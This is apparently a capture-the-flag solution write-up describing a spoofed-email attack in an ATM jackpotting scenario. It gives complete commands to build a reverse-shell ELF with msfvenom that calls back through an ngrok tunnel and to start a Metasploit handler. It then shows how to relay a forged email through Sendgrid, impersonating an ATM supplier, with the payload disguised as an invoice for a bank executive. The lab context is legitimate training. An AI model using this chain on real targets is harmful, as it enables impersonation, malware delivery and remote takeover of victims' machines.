Solution: Email Spoof - Malicious Attachments (ATM Jackpotting)Tools Used:
- Kali Linux: Metasploit / msfvenom
- Kali Linux: sendEmail command line email client
- SMTP Server (we use Sendgrid)
The big picture:
- We'll expose our local machine's port 80 to the internet via Ngrok.
- We'll create our malicious attachment with Metasploit / msfvenom
- We'll setup a Sendgrid SMTP relay, and then use that to send our email via the sendEmail command line email client.
Expose our machine's port 80 to internet with NgrokThis part's pretty easy. Go to https://ngrok.com/download and click download. Once downloaded, unzip it (and if necessary run `chmod +x ./ngrok`). Then execute it with:
./ngrok tcp 443You'll see a ngrok status screen come up, and it will show you your url and port. Pull out your url and port as we'll be needing that soon - for example, mine was tcp://0.tcp.ngrok.io:19358
Metasploit / msfvenom: Generate malicious attachmentmsfvenom --platform linux -p linux/x64/shell/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19358 -b "\x00" -f elf > ~/Desktop/runme
LHOST and LPORT are the ip/port you want the victim to connect to (in this case, ngrok's)
Replace the LHOST and LPORT from above with your ngrok information
chmod 755 ~/Desktop/runme
msfconsole -q -x "use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp; set LHOST 127.0.0.1; set LPORT 443; run; exit -y"
Setting up an SMTP relayFirst we need to get access to an SMTP relay that will let us send an email FROM our target account. The easiest way I've found to do this is with Sendgrid. You may be able to sign up directly with their free account, but what I did is use my Heroku account. In Heroku, create a new application, add Sendgrid's free tier as a resource.
You'll then need to open Sendgrid, and go to Settings / Tracking. Turn "Click Tracking" off, otherwise Sendgrid will replace all urls in your email with theirs, and that may break things.
Now back in Heroku, if you go to the Settings tab on your application and view the Config Vars, you'll have your SENDGRID_USERNAME and SENDGRID_PASSWORD. We'll need those in a second.
Sending the emailIn Kali Linux, open a terminal. We're going to be using the command below, but replacing some things.
sendEmail -u "Invoice Attached" -f ATMSupplier_EMAIL_GOES_HERE -t BankExec_EMAIL_GOES_HERE -s smtp.sendgrid.net:587 -xu SENDGRID_USERNAME_GOES_HERE -xp SENDGRID_PASSWORD_GOES_HERE -m "Your invoice is attached." -a "/root/Desktop/runme"In the above, replace BankExec_EMAIL_GOES_HERE and ATMSupplier_EMAIL_GOES_HERE with the appropriate email addresses from the challenge scope. Replace SENDGRID_USERNAME_GOES_HERE and SENDGRID_PASSWORD_GOES_HERE with the values you obtained from Sendgrid. Then... just hit enter and send that email. You should see a success message that Sendgrid's SMTP server accepted and sent the email.
Soon you're attachment will be executed by Bank Exec, and a shell will be popped for you. Open the shell and read the file containing the flag.
To get a nicer command prompt, you can use this in the shell that is popped:
python -c "import pty; pty.spawn('/bin/bash');"